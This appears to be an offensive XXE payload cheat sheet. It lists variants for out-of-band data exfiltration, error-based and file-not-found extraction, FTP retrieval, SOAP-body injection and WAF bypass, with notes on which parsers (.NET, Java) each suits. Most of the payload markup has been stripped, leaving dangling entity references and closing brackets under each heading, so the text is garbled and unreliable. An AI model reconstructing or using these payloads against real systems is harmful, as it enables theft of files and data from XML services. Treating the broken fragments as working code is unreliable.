--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
]>
&sp;
---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------
%sp;
%param1;
]>
&exfil;
## External dtd: ##
">
----------------------------------------------------------------
OoB variation of above (seems to work better against .NET)
----------------------------------------------------------------
%sp;
%param1;
%exfil;
]>
## External dtd: ##
">
---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------
%sp;
%param3;
%exfil;
]>
## External dtd: ##
">
-----------------------------------------------------------------------
OoB extra ERROR -- Java
-----------------------------------------------------------------------
%sp;
%param3;
%exfil;
]>
## External dtd: ##
'> %param1; %external;
-----------------------------------------------------------------------
OoB extra nice
-----------------------------------------------------------------------
">
%dtd;
]>
&all;
## External dtd: ##
------------------------------------------------------------------
File-not-found exception based extraction
------------------------------------------------------------------
%one;
%two;
%four;
]>
## External dtd: ##
">
-------------------------^ you might need to encode this % (depends on your target) as: %
--------------
FTP
--------------
%asd;
%c;
]>
&rrr;
## External dtd ##
">
---------------------------
Inside SOAP body
---------------------------
%dtd;]>]]>
---------------------------
Untested - WAF Bypass
---------------------------